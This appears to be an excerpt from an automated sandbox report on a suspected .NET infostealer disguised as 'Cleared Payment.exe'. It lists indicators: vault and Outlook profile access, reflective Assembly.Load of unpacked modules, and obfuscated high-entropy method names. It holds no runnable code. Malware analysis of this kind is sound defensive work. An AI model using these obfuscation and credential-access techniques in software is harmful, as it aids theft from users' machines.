                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: ncryptsslp.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: vaultcli.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: C:\Users\user\Desktop\Cleared Payment.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                      Source: Cleared Payment.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Cleared Payment.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      Source: Cleared Payment.exe, frmFolderSearcher.cs .Net Code: InitializeComponent
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, yDRZvlxv5scWOQt6gJ.cs .Net Code: X0bl7sZpNw System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, yDRZvlxv5scWOQt6gJ.cs .Net Code: X0bl7sZpNw System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, yDRZvlxv5scWOQt6gJ.cs .Net Code: X0bl7sZpNw System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Cleared Payment.exe.25aad94.1.raw.unpack, SQL.cs .Net Code: System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 0_2_0860F21F pushfd ; ret 0_2_0860F222
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 0_2_0860FC98 push 000000C3h; ret 0_2_0860FCEF
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 4_2_02BCFEE0 pushfd ; retf 0006h 4_2_02BCFEE1
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 4_2_02BC0C95 push edi; ret 4_2_02BC0CC2
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 4_2_06BA8498 push ss; retf 0006h 4_2_06BA849A
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 4_2_06BA8508 push ss; retf 0006h 4_2_06BA850A
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 4_2_06BAE9A1 push eax; retf 0006h 4_2_06BAE9A2
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 4_2_06BAE920 push eax; retf 0006h 4_2_06BAE922
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 4_2_06BA7C99 push cs; retf 0006h 4_2_06BA7C9A
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 4_2_06BA7D69 push cs; retf 0006h 4_2_06BA7D6A
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 4_2_06BAFB95 push es; iretd 4_2_06BAFBCC
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 4_2_06BAFBD5 push es; iretd 4_2_06BAFBDC
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 4_2_06BAFBCD push es; iretd 4_2_06BAFBD4
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 4_2_06BAFB23 push es; iretd 4_2_06BAFB24
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 4_2_06BAFB10 push es; iretd 4_2_06BAFB20
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 4_2_06BAFB7F push es; iretd 4_2_06BAFB88
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 4_2_06BAFB6D push es; iretd 4_2_06BAFB7C
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 4_2_06BAFB5F push es; iretd 4_2_06BAFB6C
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 4_2_06BAFB55 push es; iretd 4_2_06BAFB5C
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 4_2_06BAFB44 push es; iretd 4_2_06BAFB54
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Code function: 4_2_06BBFEDF push es; ret 4_2_06BBFEE0
                      Source: Cleared Payment.exe Static PE information: section name: .text entropy: 7.942915720013936
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, Bw6dSiwvl7k56E7yNY.cs High entropy of concatenated method names: 'UuBO6lX7xS', 'AXsOhMVC6i', 'wioOUkA288', 'wUXOjGAvyx', 'f48OeZkmtB', 'Oj8O5MZW4U', 'nFlOff1j2Y', 'nGiOQ2PTC5', 'v0JO9vlLAH', 'YkIOogj3Ey'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, nFbQTR416tkrbLUl62.cs High entropy of concatenated method names: 'FFo8nuUab6o8O6vY4LS', 'SMyQcAU4WMmIiDX16ix', 'ywrXJtgN0F', 'TV7XKFLNHL', 'qcbXP0Hxv9', 'WnHD8rUrwCQebmBkLnK', 'gxx2OjUdh1fyAlQWNZ8'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, yDRZvlxv5scWOQt6gJ.cs High entropy of concatenated method names: 'MvVriLCaHd', 'qTirRvAPrq', 'zYorIGD9KK', 'mWQr4kM5DV', 'h3PrnFnmCO', 'nJ8rXMw0vN', 'ar6rs5sCkM', 'LbZrbWeSxq', 'njPrAIYFig', 'kdmrMAYj5w'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, KTaly5jXM3x64DwGA0h.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UPrP1qcLUj', 'g1CPW0mr9S', 'xlfPEiVMt8', 'kQtPLDP6u7', 'yXFPFUXSWw', 'kZdPDV8XsC', 'vRLPmKpybX'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, Xs8DB3MgZk0T2wHAoR.cs High entropy of concatenated method names: 'gWLBsnBjoo', 'gnIBbxQcUU', 'UnIBM0P8yx', 'V6aB8jAWcO', 'HcyBNNbl9O', 'AUrBa0sQWR', 'VjDeRoCr5pHo6v5QyW', 'WA4y8tK6yBYNLpA3BO', 'tQbBBntChP', 'EgABr47Yf6'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, uY63p1y65D1YwVBHkc.cs High entropy of concatenated method names: 'ToString', 'ILNaoDNqhO', 'Yjsajm0CwT', 'Anma0f3FbY', 'R6raerOOMQ', 'FoMa57p1T7', 'X0daZeXZhx', 'eoHafAM2Qa', 'HipaQEFGxt', 's3iagYG7Ck'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, OIASNCKV7Cqca4to4f.cs High entropy of concatenated method names: 'jhcXitJbj9', 'NlNXIsRVaQ', 'RBaXnP60XD', 'i8cXsIhS80', 'HGSXbRSAmu', 'wH5nFuIbtV', 'Au9nDYEqJx', 'uQrnmxCCRb', 'OZUn3CFy30', 'WvYnpR24vN'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, QC2Q8osbJXEbt9Chsn.cs High entropy of concatenated method names: 'e0iN9tp4EX', 'HbjNwZ4XDW', 'l1UN1kbAsv', 'lI3NW9QiYD', 'sfHNjwGLd9', 'DwLN0s5Hdu', 'gnBNe4U2yZ', 'QChN5JaDtO', 'qMBNZRVDu6', 'Iy8NfZ76Bv'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, zFTePL77FIdYa78VE3.cs High entropy of concatenated method names: 'eAGT3lcwLM', 'VgMTCZOm0C', 'UGaJGtIycR', 'z78JBabvXy', 'oqUTouMYJn', 't0lTwOqxWV', 'L3qTxmRIdA', 'YgWT1itv04', 'MQvTWHityO', 'uaITEBjerg'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, oLMqPH3sBs34Mf964Q.cs High entropy of concatenated method names: 'oQ64qrByg9', 'bBq4kj2vOP', 'pdZ46kuMa3', 'oJg4hssYcQ', 'I2S4N9OHy9', 'wri4atrf8Z', 'xbG4T4uECr', 'M024JdyFd1', 'xby4KwkHEp', 'k6J4P04sCf'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, sc771bRe0eO1bpWvGt.cs High entropy of concatenated method names: 'haiI1vAQYR', 't5DIWXZVhK', 'l7mIEFMZC8', 'eQtILQxoVL', 'I0bIFuHi7r', 'ssjIDjR1pO', 'Q2VIm9Qlej', 'WomI3Usj6Y', 'xvGIp9jmaC', 'BULICDPocL'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, BPvQD6dsfOa5feW64x.cs High entropy of concatenated method names: 'Dispose', 'PqLBp10PLW', 'JZBVj0s3Ol', 'eHEuuKd91i', 'PQJBCHPto6', 'lFeBzdE2OO', 'ProcessDialogKey', 'YFlVGZGvQ0', 's9OVBTDp1t', 'GdtVVVvQEp'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, jP9Ou9nv5DuTJx91NB.cs High entropy of concatenated method names: 'wHQsRTjGf2', 'qWCs4WChTD', 'btqsXTRwUL', 'IwkXCUajUE', 'c2MXzdn1kq', 'R7vsGXkXFh', 'wMUsBY1wQS', 'ocVsVE3o4k', 'IDtsr2cbRI', 'hCyslZeme1'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, U4RRRIArA3rXPUCl8Y.cs High entropy of concatenated method names: 'yQjJU5ShN8', 'wtcJjdNIwG', 'l9wJ0upsfY', 'miQJeQuGmw', 'K94J1nn4kb', 'TpxJ5kigGc', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, nNsJw1uDfVyw7WHvxZ.cs High entropy of concatenated method names: 'HgO72N9mX', 'EouqRjWMg', 'ARLkt30Ar', 'tFc2qWwjK', 'K0jhVZA8i', 'mW3YvljYp', 'GM1ZPyfN9NTKcL7g6X', 'cbRGp6RgLIPkdVrY0P', 's9GJt974i', 'RxCP6dRRV'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, m2rgQnUJDx3OEdh7mL.cs High entropy of concatenated method names: 'qOnKBgNxv5', 'YsJKrMGQVN', 'VZLKlUOSBD', 'oBIKRqVIys', 'NiuKI6PEPJ', 'oLYKnTABWR', 'LZZKX771Bu', 'vbXJmS6a8L', 'rqGJ3X0WXA', 'rjUJpBCNvQ'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, rKVfKv0gpHmH6QEa9c.cs High entropy of concatenated method names: 'K63nSnGyUU', 'fgIn2jNOst', 'oAm40OqI7H', 'X2Q4eSA0sD', 'g5f45TLpqn', 'IkP4ZvGleP', 's8g4fZ21Q9', 'H5k4QSSDv4', 'ucL4gKh7QO', 'a0V49lugYl'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, IUtqZK55qGo14liVk3.cs High entropy of concatenated method names: 'O18sttUkD9', 't0CsvlbYnk', 'C2qs7no0II', 'aJlsq8XcOq', 'owlsSBDCuJ', 'Im4sk70xAZ', 'sBgs23hwNa', 'urYs6bPiMo', 'qUVshahlwK', 'hZLsY5mV8Z'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, DNZJZS1XXTp5Gof1dS.cs High entropy of concatenated method names: 'dwgJRDH81K', 't19JIiHUn1', 'ULmJ4y8oYo', 'sIUJnKMxdi', 'xtgJXJNDJZ', 'gDrJsUYJp8', 'WiSJbRSsvy', 'wVxJAjRAPB', 'JWfJM6IyoE', 'bfXJ8jQnmF'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, HKvQe0jcuJArh70EuSf.cs High entropy of concatenated method names: 'ctMKtVph8I', 'XAtKvDCS5O', 'M1QK7xRuPa', 'uLLKqpiCT5', 'DXkKSrtqWv', 'AehKkhsgYk', 'LsRK2uqSdQ', 'BW8K6XPtQe', 'i85KheDYd6', 'BUYKYKQkt6'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, Bw6dSiwvl7k56E7yNY.cs High entropy of concatenated method names: 'UuBO6lX7xS', 'AXsOhMVC6i', 'wioOUkA288', 'wUXOjGAvyx', 'f48OeZkmtB', 'Oj8O5MZW4U', 'nFlOff1j2Y', 'nGiOQ2PTC5', 'v0JO9vlLAH', 'YkIOogj3Ey'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, nFbQTR416tkrbLUl62.cs High entropy of concatenated method names: 'FFo8nuUab6o8O6vY4LS', 'SMyQcAU4WMmIiDX16ix', 'ywrXJtgN0F', 'TV7XKFLNHL', 'qcbXP0Hxv9', 'WnHD8rUrwCQebmBkLnK', 'gxx2OjUdh1fyAlQWNZ8'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, yDRZvlxv5scWOQt6gJ.cs High entropy of concatenated method names: 'MvVriLCaHd', 'qTirRvAPrq', 'zYorIGD9KK', 'mWQr4kM5DV', 'h3PrnFnmCO', 'nJ8rXMw0vN', 'ar6rs5sCkM', 'LbZrbWeSxq', 'njPrAIYFig', 'kdmrMAYj5w'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, KTaly5jXM3x64DwGA0h.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UPrP1qcLUj', 'g1CPW0mr9S', 'xlfPEiVMt8', 'kQtPLDP6u7', 'yXFPFUXSWw', 'kZdPDV8XsC', 'vRLPmKpybX'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, Xs8DB3MgZk0T2wHAoR.cs High entropy of concatenated method names: 'gWLBsnBjoo', 'gnIBbxQcUU', 'UnIBM0P8yx', 'V6aB8jAWcO', 'HcyBNNbl9O', 'AUrBa0sQWR', 'VjDeRoCr5pHo6v5QyW', 'WA4y8tK6yBYNLpA3BO', 'tQbBBntChP', 'EgABr47Yf6'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, uY63p1y65D1YwVBHkc.cs High entropy of concatenated method names: 'ToString', 'ILNaoDNqhO', 'Yjsajm0CwT', 'Anma0f3FbY', 'R6raerOOMQ', 'FoMa57p1T7', 'X0daZeXZhx', 'eoHafAM2Qa', 'HipaQEFGxt', 's3iagYG7Ck'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, OIASNCKV7Cqca4to4f.cs High entropy of concatenated method names: 'jhcXitJbj9', 'NlNXIsRVaQ', 'RBaXnP60XD', 'i8cXsIhS80', 'HGSXbRSAmu', 'wH5nFuIbtV', 'Au9nDYEqJx', 'uQrnmxCCRb', 'OZUn3CFy30', 'WvYnpR24vN'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, QC2Q8osbJXEbt9Chsn.cs High entropy of concatenated method names: 'e0iN9tp4EX', 'HbjNwZ4XDW', 'l1UN1kbAsv', 'lI3NW9QiYD', 'sfHNjwGLd9', 'DwLN0s5Hdu', 'gnBNe4U2yZ', 'QChN5JaDtO', 'qMBNZRVDu6', 'Iy8NfZ76Bv'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, zFTePL77FIdYa78VE3.cs High entropy of concatenated method names: 'eAGT3lcwLM', 'VgMTCZOm0C', 'UGaJGtIycR', 'z78JBabvXy', 'oqUTouMYJn', 't0lTwOqxWV', 'L3qTxmRIdA', 'YgWT1itv04', 'MQvTWHityO', 'uaITEBjerg'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, oLMqPH3sBs34Mf964Q.cs High entropy of concatenated method names: 'oQ64qrByg9', 'bBq4kj2vOP', 'pdZ46kuMa3', 'oJg4hssYcQ', 'I2S4N9OHy9', 'wri4atrf8Z', 'xbG4T4uECr', 'M024JdyFd1', 'xby4KwkHEp', 'k6J4P04sCf'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, sc771bRe0eO1bpWvGt.cs High entropy of concatenated method names: 'haiI1vAQYR', 't5DIWXZVhK', 'l7mIEFMZC8', 'eQtILQxoVL', 'I0bIFuHi7r', 'ssjIDjR1pO', 'Q2VIm9Qlej', 'WomI3Usj6Y', 'xvGIp9jmaC', 'BULICDPocL'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, BPvQD6dsfOa5feW64x.cs High entropy of concatenated method names: 'Dispose', 'PqLBp10PLW', 'JZBVj0s3Ol', 'eHEuuKd91i', 'PQJBCHPto6', 'lFeBzdE2OO', 'ProcessDialogKey', 'YFlVGZGvQ0', 's9OVBTDp1t', 'GdtVVVvQEp'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, jP9Ou9nv5DuTJx91NB.cs High entropy of concatenated method names: 'wHQsRTjGf2', 'qWCs4WChTD', 'btqsXTRwUL', 'IwkXCUajUE', 'c2MXzdn1kq', 'R7vsGXkXFh', 'wMUsBY1wQS', 'ocVsVE3o4k', 'IDtsr2cbRI', 'hCyslZeme1'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, U4RRRIArA3rXPUCl8Y.cs High entropy of concatenated method names: 'yQjJU5ShN8', 'wtcJjdNIwG', 'l9wJ0upsfY', 'miQJeQuGmw', 'K94J1nn4kb', 'TpxJ5kigGc', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, nNsJw1uDfVyw7WHvxZ.cs High entropy of concatenated method names: 'HgO72N9mX', 'EouqRjWMg', 'ARLkt30Ar', 'tFc2qWwjK', 'K0jhVZA8i', 'mW3YvljYp', 'GM1ZPyfN9NTKcL7g6X', 'cbRGp6RgLIPkdVrY0P', 's9GJt974i', 'RxCP6dRRV'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, m2rgQnUJDx3OEdh7mL.cs High entropy of concatenated method names: 'qOnKBgNxv5', 'YsJKrMGQVN', 'VZLKlUOSBD', 'oBIKRqVIys', 'NiuKI6PEPJ', 'oLYKnTABWR', 'LZZKX771Bu', 'vbXJmS6a8L', 'rqGJ3X0WXA', 'rjUJpBCNvQ'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, rKVfKv0gpHmH6QEa9c.cs High entropy of concatenated method names: 'K63nSnGyUU', 'fgIn2jNOst', 'oAm40OqI7H', 'X2Q4eSA0sD', 'g5f45TLpqn', 'IkP4ZvGleP', 's8g4fZ21Q9', 'H5k4QSSDv4', 'ucL4gKh7QO', 'a0V49lugYl'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, IUtqZK55qGo14liVk3.cs High entropy of concatenated method names: 'O18sttUkD9', 't0CsvlbYnk', 'C2qs7no0II', 'aJlsq8XcOq', 'owlsSBDCuJ', 'Im4sk70xAZ', 'sBgs23hwNa', 'urYs6bPiMo', 'qUVshahlwK', 'hZLsY5mV8Z'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, DNZJZS1XXTp5Gof1dS.cs High entropy of concatenated method names: 'dwgJRDH81K', 't19JIiHUn1', 'ULmJ4y8oYo', 'sIUJnKMxdi', 'xtgJXJNDJZ', 'gDrJsUYJp8', 'WiSJbRSsvy', 'wVxJAjRAPB', 'JWfJM6IyoE', 'bfXJ8jQnmF'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, HKvQe0jcuJArh70EuSf.cs High entropy of concatenated method names: 'ctMKtVph8I', 'XAtKvDCS5O', 'M1QK7xRuPa', 'uLLKqpiCT5', 'DXkKSrtqWv', 'AehKkhsgYk', 'LsRK2uqSdQ', 'BW8K6XPtQe', 'i85KheDYd6', 'BUYKYKQkt6'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, Bw6dSiwvl7k56E7yNY.cs High entropy of concatenated method names: 'UuBO6lX7xS', 'AXsOhMVC6i', 'wioOUkA288', 'wUXOjGAvyx', 'f48OeZkmtB', 'Oj8O5MZW4U', 'nFlOff1j2Y', 'nGiOQ2PTC5', 'v0JO9vlLAH', 'YkIOogj3Ey'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, nFbQTR416tkrbLUl62.cs High entropy of concatenated method names: 'FFo8nuUab6o8O6vY4LS', 'SMyQcAU4WMmIiDX16ix', 'ywrXJtgN0F', 'TV7XKFLNHL', 'qcbXP0Hxv9', 'WnHD8rUrwCQebmBkLnK', 'gxx2OjUdh1fyAlQWNZ8'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, yDRZvlxv5scWOQt6gJ.cs High entropy of concatenated method names: 'MvVriLCaHd', 'qTirRvAPrq', 'zYorIGD9KK', 'mWQr4kM5DV', 'h3PrnFnmCO', 'nJ8rXMw0vN', 'ar6rs5sCkM', 'LbZrbWeSxq', 'njPrAIYFig', 'kdmrMAYj5w'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, KTaly5jXM3x64DwGA0h.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UPrP1qcLUj', 'g1CPW0mr9S', 'xlfPEiVMt8', 'kQtPLDP6u7', 'yXFPFUXSWw', 'kZdPDV8XsC', 'vRLPmKpybX'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, Xs8DB3MgZk0T2wHAoR.cs High entropy of concatenated method names: 'gWLBsnBjoo', 'gnIBbxQcUU', 'UnIBM0P8yx', 'V6aB8jAWcO', 'HcyBNNbl9O', 'AUrBa0sQWR', 'VjDeRoCr5pHo6v5QyW', 'WA4y8tK6yBYNLpA3BO', 'tQbBBntChP', 'EgABr47Yf6'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, uY63p1y65D1YwVBHkc.cs High entropy of concatenated method names: 'ToString', 'ILNaoDNqhO', 'Yjsajm0CwT', 'Anma0f3FbY', 'R6raerOOMQ', 'FoMa57p1T7', 'X0daZeXZhx', 'eoHafAM2Qa', 'HipaQEFGxt', 's3iagYG7Ck'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, OIASNCKV7Cqca4to4f.cs High entropy of concatenated method names: 'jhcXitJbj9', 'NlNXIsRVaQ', 'RBaXnP60XD', 'i8cXsIhS80', 'HGSXbRSAmu', 'wH5nFuIbtV', 'Au9nDYEqJx', 'uQrnmxCCRb', 'OZUn3CFy30', 'WvYnpR24vN'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, QC2Q8osbJXEbt9Chsn.cs High entropy of concatenated method names: 'e0iN9tp4EX', 'HbjNwZ4XDW', 'l1UN1kbAsv', 'lI3NW9QiYD', 'sfHNjwGLd9', 'DwLN0s5Hdu', 'gnBNe4U2yZ', 'QChN5JaDtO', 'qMBNZRVDu6', 'Iy8NfZ76Bv'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, zFTePL77FIdYa78VE3.cs High entropy of concatenated method names: 'eAGT3lcwLM', 'VgMTCZOm0C', 'UGaJGtIycR', 'z78JBabvXy', 'oqUTouMYJn', 't0lTwOqxWV', 'L3qTxmRIdA', 'YgWT1itv04', 'MQvTWHityO', 'uaITEBjerg'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, oLMqPH3sBs34Mf964Q.cs High entropy of concatenated method names: 'oQ64qrByg9', 'bBq4kj2vOP', 'pdZ46kuMa3', 'oJg4hssYcQ', 'I2S4N9OHy9', 'wri4atrf8Z', 'xbG4T4uECr', 'M024JdyFd1', 'xby4KwkHEp', 'k6J4P04sCf'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, sc771bRe0eO1bpWvGt.cs High entropy of concatenated method names: 'haiI1vAQYR', 't5DIWXZVhK', 'l7mIEFMZC8', 'eQtILQxoVL', 'I0bIFuHi7r', 'ssjIDjR1pO', 'Q2VIm9Qlej', 'WomI3Usj6Y', 'xvGIp9jmaC', 'BULICDPocL'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, BPvQD6dsfOa5feW64x.cs High entropy of concatenated method names: 'Dispose', 'PqLBp10PLW', 'JZBVj0s3Ol', 'eHEuuKd91i', 'PQJBCHPto6', 'lFeBzdE2OO', 'ProcessDialogKey', 'YFlVGZGvQ0', 's9OVBTDp1t', 'GdtVVVvQEp'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, jP9Ou9nv5DuTJx91NB.cs High entropy of concatenated method names: 'wHQsRTjGf2', 'qWCs4WChTD', 'btqsXTRwUL', 'IwkXCUajUE', 'c2MXzdn1kq', 'R7vsGXkXFh', 'wMUsBY1wQS', 'ocVsVE3o4k', 'IDtsr2cbRI', 'hCyslZeme1'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, U4RRRIArA3rXPUCl8Y.cs High entropy of concatenated method names: 'yQjJU5ShN8', 'wtcJjdNIwG', 'l9wJ0upsfY', 'miQJeQuGmw', 'K94J1nn4kb', 'TpxJ5kigGc', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, nNsJw1uDfVyw7WHvxZ.cs High entropy of concatenated method names: 'HgO72N9mX', 'EouqRjWMg', 'ARLkt30Ar', 'tFc2qWwjK', 'K0jhVZA8i', 'mW3YvljYp', 'GM1ZPyfN9NTKcL7g6X', 'cbRGp6RgLIPkdVrY0P', 's9GJt974i', 'RxCP6dRRV'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, m2rgQnUJDx3OEdh7mL.cs High entropy of concatenated method names: 'qOnKBgNxv5', 'YsJKrMGQVN', 'VZLKlUOSBD', 'oBIKRqVIys', 'NiuKI6PEPJ', 'oLYKnTABWR', 'LZZKX771Bu', 'vbXJmS6a8L', 'rqGJ3X0WXA', 'rjUJpBCNvQ'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, rKVfKv0gpHmH6QEa9c.cs High entropy of concatenated method names: 'K63nSnGyUU', 'fgIn2jNOst', 'oAm40OqI7H', 'X2Q4eSA0sD', 'g5f45TLpqn', 'IkP4ZvGleP', 's8g4fZ21Q9', 'H5k4QSSDv4', 'ucL4gKh7QO', 'a0V49lugYl'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, IUtqZK55qGo14liVk3.cs High entropy of concatenated method names: 'O18sttUkD9', 't0CsvlbYnk', 'C2qs7no0II', 'aJlsq8XcOq', 'owlsSBDCuJ', 'Im4sk70xAZ', 'sBgs23hwNa', 'urYs6bPiMo', 'qUVshahlwK', 'hZLsY5mV8Z'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, DNZJZS1XXTp5Gof1dS.cs High entropy of concatenated method names: 'dwgJRDH81K', 't19JIiHUn1', 'ULmJ4y8oYo', 'sIUJnKMxdi', 'xtgJXJNDJZ', 'gDrJsUYJp8', 'WiSJbRSsvy', 'wVxJAjRAPB', 'JWfJM6IyoE', 'bfXJ8jQnmF'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, HKvQe0jcuJArh70EuSf.cs High entropy of concatenated method names: 'ctMKtVph8I', 'XAtKvDCS5O', 'M1QK7xRuPa', 'uLLKqpiCT5', 'DXkKSrtqWv', 'AehKkhsgYk', 'LsRK2uqSdQ', 'BW8K6XPtQe', 'i85KheDYd6', 'BUYKYKQkt6'
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
